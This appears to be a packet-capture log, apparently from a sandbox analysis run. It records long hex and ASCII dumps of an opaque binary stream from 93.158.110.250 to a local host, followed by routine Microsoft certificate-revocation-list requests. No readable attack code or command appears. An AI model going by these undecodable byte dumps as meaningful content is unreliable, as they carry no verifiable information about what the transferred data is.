Feb 5, 2015 14:55:37.137027979 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 70 6d 2c a3 79 5a f3 3c e7 94 d4 c5 d9 1b 07 26 99 6e 2a ee 28 f4 ec ff 4d a3 53 c3 c1 56 1a 26 79 14 28 f9 1d b0 e9 d2 f7 36 36 ae df 84 1a b0 fa be a6 ab 38 89 94 08 0c 7e 5a 54 3b 9d 8e 9c ce 20 3a 50 bc aa db 85 87 8f d7 74 ba 00 8d d6 1e 30 Data Ascii: pm,yZ<&n*(MSV&y(668~ZT; :Pt0ZM3J,Z-;^a	22
Feb 5, 2015 14:55:37.137211084 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 7b 75 be 40 75 ac 3b 95 e3 94 6e 98 aa c7 16 8f c1 d7 37 43 c1 68 91 b3 84 d2 dc b2 3e 36 c5 32 13 96 d9 b3 3c 3e 99 a6 34 22 33 3a 5f af 36 2a e6 5c 68 6a 62 5b fd a7 76 a6 7f 42 eb c7 df 99 80 f7 58 40 9f 8a 1b b0 a3 85 c1 59 f0 a3 e8 50 9f 3b Data Ascii: {u@u;n7Ch>62<>4"3:_6*\hjb[vBX@YP;,nWycd!W.IzLWgX^;%Xfm:oz@;[{{y['l+T1t2)0x"y\0#t szIb8M:`dF	23
Feb 5, 2015 14:55:37.137227058 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: fa cf ec cd 61 18 7c 94 ae e9 94 08 99 f7 f6 2f 69 92 a1 7a 0d 01 1d 59 97 88 68 81 86 11 88 2d 44 88 87 ef 0e 1a 73 cc 05 cf 15 d3 a3 a7 cc 5e 9c 22 75 3d 9d ab 9a 6c 3e e6 12 ff de 2a c6 b0 50 18 7e 81 1b 78 a7 20 54 aa fb ee e6 9c 8c a5 c7 d9 Data Ascii: a\|/izYh-Ds^"u=l>P~x Tk;Qd>-/=T`'4y!qi$AO:'?o>K!.0MFgl]s8m)SQNTH*C8ax?/+~_}6M pH0eS'Y,k5	25
Feb 5, 2015 14:55:37.137623072 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: b9 a0 8e f9 40 35 d6 7a a6 d0 15 eb b8 bf bb e0 93 51 7a 94 5f cc ba 1f 1d ae 6b e8 5a 03 96 b2 20 0f 0b 5c a8 d5 66 e5 5e 85 57 45 e0 ef 07 66 5f de 2a 82 fa ab f8 17 8d f0 4f 93 2c bf 4f b0 6c e4 96 3d 44 51 dc 71 2a 40 20 42 20 0c 7e bd 0f 34 Data Ascii: @5zQz_kZ \f^WEf_O,Ol=DQq@ B ~4{8dmnC@0Z$G9R&gHH.bW5U$]\|TV79=h[$e#;_K>S\|C'4p>TqOyKW\B.=	26
Feb 5, 2015 14:55:37.137634039 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 58 83 93 a6 4b 19 4f 03 16 66 55 31 24 3e 2b 79 23 9b 2f 6e 24 51 a3 18 ff 80 e5 f1 a5 d9 73 06 30 af 36 1c 51 4f 2e bc 77 df 30 7f 22 3c da 5a 44 4e a9 f4 11 71 8c f4 f5 8b 84 14 ac c3 c5 cd 81 de cf 7f 69 a7 40 9a 7c e8 80 96 07 af 25 ff 2a a8 Data Ascii: XKOfU1$>+y#/n$Qs06QO.w0"<ZDNqi@\|%*PRK`2TJ}$qq&'2,WBM5F9yDLE~ty7.?gE=O(sOY2sJC^YVA9iv.(}E~N9T%zD\ioz#@V40:	28
Feb 5, 2015 14:55:37.137640953 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 9e a2 cd c8 04 ed 83 58 4f 42 fe 1d 6b 86 c2 02 30 29 e0 8c dd d7 2c a9 32 ae 0e 47 05 d6 87 0c 4a 37 a1 dd ce 71 da 9f 64 73 a3 f6 95 25 1e fa 3e 32 72 17 34 5b ea 7b c9 f9 11 cb 74 b6 c5 8d eb 84 1b 57 17 cc d9 2f c4 29 e5 41 5e cd 7b 5a ee 64 Data Ascii: XOBk0),2GJ7qds%>2r4[{tW/)A^{Zd&I\|]p{hItjJyjH*>OP~E~P873BZ[:NTS}3dC+TSc0'One2rh^'OMGYL,YUF_^	28
Feb 5, 2015 14:55:37.137917042 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: ae 26 6f 00 e8 f1 a3 7f c9 21 01 d6 b4 9d 5a ed da c9 01 48 f6 1a 43 cd bc e1 d6 48 57 e9 e7 5c 1a 91 b1 96 2e 15 23 b9 20 23 1e 98 82 ec d1 b7 ec c8 2a 2d b4 da 51 ae cb 3b 09 18 5d a0 e3 a7 b7 12 9c b4 3e 64 2d a0 dc 3e 3c 54 6b 86 8a dd a6 54 Data Ascii: &o!ZHCHW\.# #-Q;]>d-><TkT)KLVyqU[zK2--Nf#f(JH`Kyd&i:'"E`)\|uEvGE\|BW0~sVdg_1*t96U	30
Feb 5, 2015 14:55:37.137928009 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: eb 7e ee e7 b9 9f fb b9 af eb a2 c8 2c 92 03 1f f4 ab ab fa 68 fc e0 85 aa 4b 4f 7c 61 41 33 af 93 29 88 51 6b bb 82 b1 b4 44 db 84 de 58 6f c0 e5 60 d1 cb 04 a5 b7 ee 00 33 1b e9 a1 85 94 47 fc 5c e4 08 2c b3 27 dc 78 38 9b 64 5d ce e0 a7 8a d5 Data Ascii: ~,hKO\|aA3)QkDXo`3G\,'x8d]b-uaOns;@bmKK!ZS95%^<bgO~u2^`uklE6mPRp*+c[D5U!GsWCO&]+r5Z!6	31
Feb 5, 2015 14:55:37.137934923 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 5e 98 f7 f1 5c 0a 17 97 e0 76 e7 00 7e 7d fe d5 62 32 06 a2 a5 ab fa 9a ac 69 53 ae 14 da 99 7a da 63 2c 7b 87 1b 59 a4 75 fd 2d 5a 56 db 7f 8e 4a f3 ef 2c 3b 80 72 1f 50 fc 18 68 79 f9 33 3e 3c 5b 6e d0 d7 21 50 41 a7 7a 01 23 3f 5b ee b3 dc 29 Data Ascii: ^\v~}b2iSzc,{Yu-ZVJ,;rPhy3><[n!PAz#?[)~i.EDH)0gZ~Hb9w$BSSw:*'pxpZ"q@v#L)6/g'ta+xy,K84/A}T'2?)`[LfVaF	32
Feb 5, 2015 14:55:37.138362885 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: fe 62 a2 92 4d 2d 88 7c 73 6a 84 c7 43 0a 79 9e aa ca b8 c5 51 72 02 f9 79 aa 46 10 24 2d 27 7c 13 df 18 d1 26 48 56 d5 84 8b e5 52 b4 d6 fb ad 9a 55 c4 6a 58 bb b1 b4 ae 34 74 9a 2b 00 1b c0 48 46 95 dd df 08 7d 69 38 b2 63 b7 fb 8f f6 2e 98 68 Data Ascii: bM-\|sjCyQryF$-'\|&HVRUjX4t+HF}i8c.hI)j*;Z{8f[ L,\|GCkK()O79oIeNK`kaY{R?\/G3\@JWV3Vp]Cu"VL	34
Feb 5, 2015 14:55:37.138389111 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 00 c4 f5 fa f3 2f e5 86 70 6e 3a 38 23 89 e8 3b 3d 7c bf 7c 16 70 d8 6c 75 fc fc 85 14 77 87 02 1e a2 e2 2e 3e 62 8e c6 75 70 af af 32 ba 8a 05 e9 5d a1 fa c9 8d aa 52 f0 8a fb 34 57 cd b3 64 6f b3 5e 3f 1a 56 be a5 b2 57 66 20 ef 36 d9 2c ce 15 Data Ascii: /pn:8#;=\|\|pluw.>bup2]R4Wdo^?VWf 6,JhUf:~bof~WKGn7b5et(22[vu#KdP41MQG/.Q#ySiX.\|Ox}	35
Feb 5, 2015 14:55:37.138397932 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 96 31 36 2e 98 e0 7d d8 bb c6 62 66 cc 02 d4 37 81 a6 8b 3b 3a f0 6e 63 13 18 cd d5 65 f1 cf c6 90 5a 4e 9c 28 9a d3 1a 25 65 23 60 4f 32 a5 6f b9 2f dc 8c 11 8d f9 5c 93 38 f2 07 76 96 42 d8 58 ea 44 42 16 4d 92 d7 94 7e 3c d2 e3 ab bf 9f e4 db Data Ascii: 16.}bf7;:nceZN(%e#`O2o/\8vBXDBM~<h+.#l,IF}&bsMk#lDJR47ohe7{qDpWXAqipl6$h"62LGkl}MtAZRTkve6/qzOM\V7T_	36
Feb 5, 2015 14:55:37.138458014 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 25 e2 f0 20 1f e5 05 cf cd 99 38 8b 8f c0 e4 c9 1d 48 a9 6b 19 2e a8 26 e6 77 8b 05 e9 87 8b 43 c7 59 88 d5 1d a3 a7 d5 c9 ef 98 61 6e 45 c6 f8 56 00 8c 9b 61 30 4f ea 15 cd af 56 67 15 68 f1 dd ab 2f ec a0 ee a0 af fe 3b 71 46 91 e9 52 9e 89 33 Data Ascii: % 8Hk.&wCYanEVa0OVgh/;qFR38N>{4&%>[ ){qWH*0W5[X)VT!Fhp)Mryg~UkG43G2O"Cx)Jhn4]{z$>V>R?8%Zw	37
Feb 5, 2015 14:55:37.153579950 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: f5 21 09 64 88 a4 d0 1d 66 3b 34 47 4e 79 9a a3 10 77 68 27 37 84 9e c7 39 9a 2e 26 af 7b 24 7d c7 18 f7 b4 ae ca 50 ec 2a 2d 7b 4f 70 5d 77 5e 47 76 e1 19 0a ba 0b 97 99 7e 97 bf c0 77 a2 b3 aa 35 89 d6 bc 17 7b 43 74 53 37 03 57 90 68 6b e7 98 Data Ascii: !df;4GNywh'79.&{$}P*-{Op]w^Gv~w5{CtS7Whk}FYQ:ZYP!A?hQasR\|71<&eqeB0Hw0qmq=n~By9yc8hva_)%_'$e.f7`	38
Feb 5, 2015 14:55:37.153599977 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: f3 5e 9c 7c 00 c6 f1 e6 81 07 f4 62 12 cd 44 f1 d9 96 12 d3 a4 d9 46 11 ad 12 88 3f 81 a3 3d df 74 ae 9c b8 d0 58 52 cb a3 ab f3 32 b7 ec f9 e6 47 ef 44 8e 2f cc df e0 cb 68 9f 42 70 2f f2 5f 5c 85 a3 0d 60 45 90 ff d7 fa 2a ff 8f f3 02 b1 f8 e3 Data Ascii: ^\|bDF?=tXR2GD/hBp/_\`E*d_F@<Bf_\|+t4[t\YQLW{wHzc{J/+Agl2f+qva5cu=D.Mzg3dob("G19	40
Feb 5, 2015 14:55:37.153677940 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 21 b1 05 09 18 da 6b e4 8f f7 05 31 f4 25 8f 86 07 d0 cf 4d 8b 1f 14 a9 ae f3 f8 13 07 e4 9c f5 8e a9 a2 fe 08 52 17 d9 30 5f fd 69 7f 12 c7 98 71 d1 72 53 83 9a 73 0a 69 9b 4b d8 24 5f 63 51 5c 89 08 1b c0 fa 6f 07 8d 95 63 57 ff 52 9e c4 46 07 Data Ascii: !k1%MR0_iqrSsiK$_cQ\ocWRF9\RF$&&Z*,@Fv>bjN<6"8hvA,&Z5,W\v9OSW." T[kE}!f]@SX+MqU	41
Feb 5, 2015 14:55:37.153723955 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 19 ac f0 14 05 42 55 14 d2 4f 01 35 0b 20 03 15 07 e5 66 c5 9f f8 6b 1f d7 da f5 b9 78 a0 f1 e0 e8 a1 43 02 a8 76 30 1a a3 c3 d1 a3 9b c4 0f 84 cc ed 74 d5 7e b6 4d 15 82 7b eb d6 74 3c 81 61 4f 63 78 67 b5 d2 cd d9 a4 d7 3a 51 9c 13 3b 7e 33 58 Data Ascii: BUO5 fkxCv0t~M{t<aOcxg:Q;~3XOv4"YXzE{?2c_OhA@:v_,T}QXp.88O\!noK/x0(*YVw:H-@Ji1XB]7K/A'ejU8Hr	43
Feb 5, 2015 14:55:37.153773069 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 55 95 a7 07 7c 73 86 ee 5c 44 18 0f a1 94 72 77 44 2b 6b d6 71 dd f6 5d 15 eb 93 e1 62 7d 7e c9 1f a6 df af a4 da af 2c 56 a0 3c 56 4d 97 03 60 b7 b6 b3 ac 05 be 1f c0 14 36 b9 9c 7b 1e 59 96 ee 21 fc d6 65 39 55 27 14 c4 1c 96 ef bd 09 4f 78 8f Data Ascii: U\|s\DrwD+kq]b}~,V<VM`6{Y!e9U'Ox?4IY\|}>.35vh6	43
Feb 5, 2015 14:55:37.154066086 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 9f 9b 87 5e ca 4c 2a fa 1b c8 a8 f5 ef c7 da 61 4c f8 46 b7 42 74 80 6b 63 48 b7 d6 dd a7 30 37 7d 4c 71 54 ae 5d 7a 57 1e 4b c1 3c 44 6f 9a 08 a3 bf f0 e1 42 af 8a d6 7f cc 0f b0 35 6b fd 93 b6 ae f1 2e 92 96 d4 3c 5a 71 dc 64 4b a4 d3 ff ef 72 Data Ascii: ^L*aLFBtkcH07}LqT]zWK<DoB5k.<ZqdKrH;vO]Q"u__dqW(^WRKoR$9rG6!EIlMoI]p-.l3qprCkqQCc:~qGqdfoqeMGBd$)dJ(9FFvt	44
Feb 5, 2015 14:55:37.154077053 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 37 40 74 83 1c 86 36 b4 be 30 1d 36 13 56 7f 3a 54 da 00 02 43 4a 27 25 0f 8e 88 ec 78 9c bd fd 55 16 ce 8c 53 02 7c 0d 07 0d b2 22 10 e4 dd f6 b6 d8 89 75 8d e5 7d 1d 4f 66 43 0e 38 a1 80 20 8f 8e 24 8d 1d bc 5f 5a c8 ae 74 e2 7d 79 a4 67 88 7d Data Ascii: 7@t606V:TCJ'%xUS\|"u}OfC8 $_Zt}yg}.m VOp>V%%KU7Ti 3xN@O^ij*FS-b6#M1cauD4TF2^CZQ$8CxT&T}zSK/JMM4cy@<"; w	46
Feb 5, 2015 14:55:37.154140949 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 85 1d 64 5c 54 eb 79 a3 fb 81 38 68 30 dd b9 4c 09 9f 7f 76 2e f7 08 b4 99 f3 e3 4e 20 0e 72 5d 69 be 36 62 17 54 43 ed 5b e5 1f d8 c8 d1 cd 56 fb 24 01 c7 d7 75 06 75 28 75 b2 77 e4 70 a7 cd d9 0f d6 f4 f3 1c b2 f4 24 99 e5 e7 a6 f8 0b ae ea 16 Data Ascii: d\Ty8h0Lv.N r]i6bTC[V$uu(uwp$wFa{:TTqmVix}RrK,j\|?Bdb\|A!&{x cgTS^T{j\'/!	46
Feb 5, 2015 14:55:37.154505014 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 96 e5 1c 53 56 af 58 6d 60 df 9c 98 61 5d 9e 24 83 c5 8d 59 ea 52 98 f7 10 87 cd 66 88 0d e6 7d 4f 6e 93 ae c3 80 ae 73 1c 36 cd 41 f5 31 1b c7 7a 93 18 b9 05 4c 67 88 13 8f c3 4f 7b 0b 03 4f 6f 02 1c 9c ef 13 98 b6 2c 43 13 08 2c eb 3c 97 95 39 Data Ascii: SVXm`a]$YRf}Ons6A1zLgO{Oo,C,<9"gCtvk5@8Jw*=3`7vV\|B[tHVE~Auq'nWd(E;b&fvfIcy4F9`S^nyuMo\|t	48
Feb 5, 2015 14:55:37.154515982 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 30 85 ea 4b 33 7d 90 7c 70 07 4e 11 1c de 70 99 32 18 9e da 00 2a a3 8e f7 19 53 10 3f 10 73 a4 e7 7c 06 32 2e 5a 62 ff 07 87 b1 a8 a5 74 41 be ed 38 b7 f5 5b b2 a8 a1 6f dd 5c b6 4d 78 e8 6f 59 bd 84 eb ab 57 15 73 a9 73 c0 c4 be ac 2b 4f bf df Data Ascii: 0K3}\|pNp2*S?s\|2.ZbtA8[o\MxoYWss+O-6}sHf/ nSb!^U82&B\|%25gou38zFE)z.[EWh<a"BMy}oM,YB-j)d-PB,%E]YEd+rw9s	49
Feb 5, 2015 14:55:37.154597044 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 5a 57 47 8f 65 e2 80 92 5c 7a 24 c2 a4 c4 44 c4 86 80 f4 7b 3f ac 0b 29 31 99 41 af 4c 8b b8 fc 9d 8f 36 fc e2 d9 cf 60 55 27 1e 57 68 d2 45 3a c4 aa 48 6d 9e 5e 4e 55 94 0b be 78 aa 8b 2e 07 e8 b9 3e 8f 9e fc b2 34 5a 9b c3 0d 62 76 c4 12 64 c0 Data Ascii: ZWGe\z$D{?)1AL6`U'WhE:Hm^NUx.>4Zbvd$O:cpFS}oY{EmJ;xJup=1-oM\})7"skfVrela(-vs9F;)^<./jpbmO'8;@H{nV+=R9z;3Ez.	51
Feb 5, 2015 14:55:37.154758930 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: c6 77 78 3f 59 20 e7 14 d9 bc 75 35 a2 e5 f5 54 68 9c 32 89 08 f8 d0 25 93 c0 7e ec cf 93 94 d7 59 ca e7 69 82 c5 53 40 44 d8 a0 1c ad 63 b1 dd 15 e8 84 a3 b9 8f 3c 51 f4 28 d7 aa 17 c5 40 ad 76 1d 42 92 46 f4 57 5e df 95 81 c1 a5 c6 4c 1a 86 47 Data Ascii: wx?Y u5Th2%~YiS@Dc<Q(@vBFW^LGP2FY?i\|8;GWCu3J-}>Kr~,JH;~Y9lc$2X ]aL.;_P{lX#F(cEJiM3?\aB41;~'	52
Feb 5, 2015 14:55:37.154768944 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: a4 d3 eb 5a 2d e4 83 36 f7 d7 7f d7 55 71 d2 65 0c a3 bf d7 bd 2b 6e 8e 8e 0e a5 66 be 2f b1 cb f8 a7 4f f9 49 06 dc 7f 32 3e 16 1b c2 a3 03 68 9f c0 c2 6b f5 3b 8b cb 5f 11 80 b5 92 80 16 80 98 0a 52 0e a1 1d c1 2f 4a 9b 54 43 6a ed a0 0a 68 98 Data Ascii: Z-6Uqe+nf/OI2>hk;_R/JTCjhFaWIP40kz_E.1He]dy4'K K_PoFS?\"\*ve{w3$az&X9),H[1PBW	53
Feb 5, 2015 14:55:37.154843092 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 1c 30 e5 32 fe 25 b3 ec 7b 85 18 b8 96 ab 2d 5c de 43 00 e2 81 0f f9 e1 c0 88 82 7c 7e a2 92 c2 d7 f6 c4 5b 17 28 c6 74 b8 bd 9b 60 4c 26 3c 48 07 55 ac bb 14 51 92 0e 64 4b 87 c4 00 28 7a 8a 2f 7c da 2e 47 b0 87 09 8f 94 9e ad 3b 67 fc da ca 2d Data Ascii: 02%{-\C\|~[(t`L&<HUQdK(z/\|.G;g-Ow\vy~[+E{2AyB H6iW%th=iR<)l@yt+l`JMj~/vhGp#InzEDly=^	55
Feb 5, 2015 14:55:37.155162096 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 69 7a cf 28 0d bf 2e 4d 6d 8e 23 bc 4a a2 81 c5 ee 5f 9d 79 2a 00 c2 c4 88 74 ca 23 d4 43 cb 47 ec c6 8c 9a 4c cb eb 63 66 b5 93 f0 5a 3e 4f 18 8d 12 8a 93 1b 82 88 35 2d 9f ed bc d5 9c 0d c5 6e cf b6 cf 45 26 98 57 11 cc 44 c7 ab 54 05 38 9c 44 Data Ascii: iz(.Mm#J_y*t#CGLcfZ>O5-nE&WDT8D%NfRdZT&XYm_xp~rucCNd%dsx\|3h}&0u<FU,4Q$[U[]jY$ TnsTW}Sj#	56
Feb 5, 2015 14:55:37.155173063 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 4d 20 79 63 df 87 f0 58 1f dd bc 31 2d 65 1a 79 98 ee d6 de 91 57 71 ed 6d fb 49 16 33 df a0 4d 46 b3 e3 65 9c 66 72 a1 60 4d 12 da 89 d4 e0 f4 9d f4 37 68 8a 30 ac 5d 1c 15 7b cf 80 b3 3d c2 7d 8b f0 c8 63 92 79 c0 22 1f 5a ed 53 03 13 b3 eb 8f Data Ascii: M ycX1-eyWqmI3MFefr`M7h0]{=}cy"ZSuj96ty{e~Fn{n'yT\|AxnctmRx)d>(81y^vD`Trt43F/K1wXm<R6))(#xM!#$"G(	58
Feb 5, 2015 14:55:37.155251980 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: a7 a9 ea 0a 7e f1 5d 9a 32 b9 51 47 6b a6 fc 3d 69 f4 89 52 a1 ab 30 98 37 e7 8a 0e 9c 23 4c 3f 15 9e b6 f9 84 1c 0b 61 49 bc c4 5b 31 96 59 3a b5 70 cf c7 cd 51 0f 7f d3 21 3f ba 0e db fd 80 98 3a c8 b3 fe 1a ed 57 25 f5 56 c5 bd d6 1b cc ae 33 Data Ascii: ~]2QGk=iR07#L?aI[1Y:pQ!?:W%V3cJ)i+Md",1ig'i Ee$_b;A\|J(eHGYhfPVa3KJ^\|GHqbObN69Tw<>LK	59
Feb 5, 2015 14:55:37.155322075 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: ef b9 ac 1f 05 85 e4 ef 12 9a 97 fe 32 12 0b 13 7b 2d f8 a3 85 f4 bb f2 6a 10 30 5a a1 5b 26 3f 9e 62 35 98 bb d7 33 7a ea 25 61 8f d6 eb fb fb 74 af 1f 0b 77 56 b7 99 9e fc d4 f8 2a 5c 08 7a 6d 2d 55 96 1c c0 e6 c6 b2 35 24 f4 da 12 f8 9e a5 55 Data Ascii: 2{-j0Z[&?b53z%atwV*\zm-U5$U6s^wccJs~B2fIA0sX'2w2b(8_za(0!D<mVaA,6U2yC+ZRe6Wy;L,	60
Feb 5, 2015 14:55:37.155392885 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 95 ca 96 8e 56 3e cc 47 e8 92 dc 48 e6 f1 97 df ed 1f a2 89 5f f8 69 82 5f a6 17 ba 24 73 22 13 fa f6 e3 a9 d1 71 a8 51 61 ca ee 8e 54 31 3e ed c5 7f d5 66 80 f7 8d 81 ea ad 8b 1f 3a 16 c9 1f 4f 61 6f db 5e 4c 72 46 c2 c8 cc f7 39 bf bd db b6 f4 Data Ascii: V>GH_i_$s"qQaT1>f:Oao^LrF9;&2gV:fI#o_	60
Feb 5, 2015 14:55:37.164155960 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: ad 73 ee 9b 5b 52 ad 20 81 22 43 f5 c9 e6 46 72 ee c4 4d 2a 95 2d 21 53 37 32 1f 41 91 91 2b 73 4f 55 7f 39 67 c9 29 da 77 f0 c1 94 7a 39 81 cf 8e 78 e8 77 0e 14 26 b3 0e d4 d3 16 37 78 c5 b3 2c 30 7a 87 ea 50 d5 33 44 d2 e9 0b f2 86 95 29 03 6a Data Ascii: s[R "CFrM*-!S72A+sOU9g)wz9xw&7x,0zP3D)jYUa$V:1YyS]X`F4/Jb<k?L%Y!\M&C>%}j(;pLi+2s&(U'B(gr"tchQLoI>; pGO)	62
Feb 5, 2015 14:55:37.167644024 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: c0 b1 33 3e 89 7a 5b 4e fc 59 41 13 d3 31 af 07 c3 9a 7d fc c1 71 bb 47 98 96 f4 76 b6 20 52 c7 d1 2c 34 45 18 9b 05 cc fd f6 d0 3f 26 f5 36 6b c4 b0 29 49 bd c6 33 cb 38 89 4e 5d 95 eb c1 88 b8 e6 24 e7 a2 88 73 1a 3e 50 23 ce af 31 7f b9 3b 23 Data Ascii: 3>z[NYA1}qGv R,4E?&6k)I38N]$s>P#1;#Gn`77Tw525O3N/7\|k:J>!bBU0t^EA@{BEM#Hob UDPD"K]eV?@93w73w[!"`cqw,taME	63
Feb 5, 2015 14:55:37.167751074 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: fd ef e2 8c 50 74 c5 3d 30 24 4a 33 bc 6b fa 6d 80 46 8a 55 3c c2 e3 49 59 eb 70 fc f6 02 2c b1 86 8a 5d b4 f9 38 87 7f c9 b5 69 bb 8b 72 cd ae bd 79 69 e0 ab 86 3f c6 01 a2 a6 2d b5 e0 bd 1a 74 e1 2a f1 d9 e8 99 f3 f7 8e 9c ba 7f 13 07 13 29 fd Data Ascii: Pt=0$J3kmFU<IYp,]8iryi?-t*)~}i1mH)t^M0p0$636^mo`K\|A2"9BySUo>=0in[Xi+{Wvo[Ikt&+	64
Feb 5, 2015 14:55:37.178174973 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 1f 73 5c d5 b9 b8 4e 81 d3 15 b3 c3 86 60 59 7a ef a1 b7 f9 80 3a 7c e0 0a 63 59 4c ed 79 de 2c 3f 59 63 2a 87 c4 ba c7 ea 78 32 cf f5 98 e7 cd a0 46 95 07 23 79 54 0b d6 0a 6f 3a 35 3b f0 2a 37 7c f1 64 ff c9 56 b0 e5 f2 6a bb 25 9f ef 66 8d af Data Ascii: s\N`Yz:\|cYLy,?Ycx2F#yTo:5;7\|dVj%foZCh0c^s6-T3.#v)%g[/'wHI= onp-LT/#1Z73G:$fKD`;ZZ#J[$LdBIpzF	65
Feb 5, 2015 14:55:37.178193092 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: c9 4c 48 f9 cc 3e bd 2e b3 d2 6b f5 be 1d c2 7e ef f1 56 84 d1 60 a1 b0 34 2e b1 76 76 d6 3a 1e f6 5e 15 54 38 dd de e4 a6 c4 ae 91 a3 0e e7 f6 85 17 eb e9 4a f6 11 c3 1f 76 be e9 28 d7 be 6f 26 d8 6b 9c cc 68 71 2d c2 12 09 ed 3c ef 96 d1 81 31 Data Ascii: LH>.k~V`4.vv:^T8Jv(o&khq-<1Dj6D}'?PJqK_IHQ,(c=R`da9%)rB`t_`1ZBe*CHZyEqJ^\|GH[-SE}Lf)_\Z	67
Feb 5, 2015 14:55:37.178284883 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 5a 75 a0 c2 d4 35 24 18 0b 5a e8 d2 f0 af 7f 9e 71 09 82 e9 9e 33 15 ed ad df 38 a6 34 b6 69 16 5b e3 d3 a0 2c 7b 6a 85 a9 0d 90 9a 6a 0c 01 15 71 f1 f0 69 b5 c0 ed 2a a8 2b 24 7f 6a 60 f8 fc db e4 8f d9 ba f0 c1 10 6f db ec c7 b8 fa 9a a2 58 05 Data Ascii: Zu5$Zq384i[,{jjqi+$j`oXVUE1%=\|5\|ZmUJlQsJdWpHTj\|nbKk3oV{-_XZ.-a?\|_vn_j><S	68
Feb 5, 2015 14:55:37.398458958 CET	80	49190	93.158.110.250	192.168.2.151	Data Raw: 4a 1d 33 6d 45 d3 03 fa ae fa f9 b7 3c aa 4c a2 e5 b0 65 6a 5d f1 c1 56 0c d0 61 c3 aa 52 55 85 99 f8 59 37 dc 9d b6 f1 02 81 d1 f7 fe 06 4f 83 7e d8 12 e5 f3 72 1f 73 18 12 61 6b fc 87 6e 87 98 44 bb 8e e8 8b b6 27 1e 9b 11 db a7 47 3b eb 48 8f Data Ascii: J3mE<Lej]VaRUY7O~rsaknD'G;Hd$C?]X:pvs>"\cQA +/J8=-!0;?#VL(:nFaU3q*_>lgwGJill,zw%#+IPKno;PQd[Skz1-	69
Feb 5, 2015 14:55:59.759532928 CET	49191	80	192.168.2.151	80.239.247.17	GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1 Connection: Keep-Alive Accept: / If-Modified-Since: Mon, 21 Mar 2011 18:10:04 GMT If-None-Match: "9f711034f3e7cb1:0" User-Agent: Microsoft-CryptoAPI/6.1 Host: crl.microsoft.com	74
Feb 5, 2015 14:55:59.969969988 CET	80	49191	80.239.247.17	192.168.2.151	HTTP/1.1 200 OK Content-Type: application/pkix-crl Last-Modified: Wed, 07 Jan 2015 06:02:43 GMT Accept-Ranges: bytes ETag: "88c4768d3f2ad01:0" Server: Microsoft-IIS/8.0 VTag: 438282544000000000 P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI" X-Powered-By: ASP.NET Content-Length: 813 Cache-Control: max-age=900 Date: Thu, 05 Feb 2015 13:55:02 GMT Connection: keep-alive Data Raw: 30 82 03 29 30 82 01 11 02 01 01 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 30 5f 31 13 30 11 06 0a 09 92 26 89 93 f2 2c 64 01 19 16 Data Ascii: 0)00*H0_10&,d	74
Feb 5, 2015 14:56:00.198529005 CET	80	49191	80.239.247.17	192.168.2.151	Data Raw: 03 63 6f 6d 31 19 30 17 06 0a 09 92 26 89 93 f2 2c 64 01 19 16 09 6d 69 63 72 6f 73 6f 66 74 31 2d 30 2b 06 03 55 04 03 13 24 4d 69 63 72 6f 73 6f 66 74 20 52 6f 6f 74 20 43 65 72 74 69 66 69 63 61 74 65 20 41 75 74 68 6f 72 69 74 79 17 0d 31 35 Data Ascii: com10&,dmicrosoft1-0+U$Microsoft Root Certificate Authority150106214825Z150407100825Z00a/100208014912Z_0]0U#0`@V'%SY0+70U(0+7150406215825Z0H	75
Feb 5, 2015 14:56:09.146416903 CET	49191	80	192.168.2.151	80.239.247.17	GET /pki/crl/products/WinPCA.crl HTTP/1.1 Cache-Control: max-age = 900 Connection: Keep-Alive Accept: / If-Modified-Since: Mon, 11 Jul 2011 17:48:17 GMT If-None-Match: "529950b7f23fcc1:0" User-Agent: Microsoft-CryptoAPI/6.1 Host: crl.microsoft.com	76
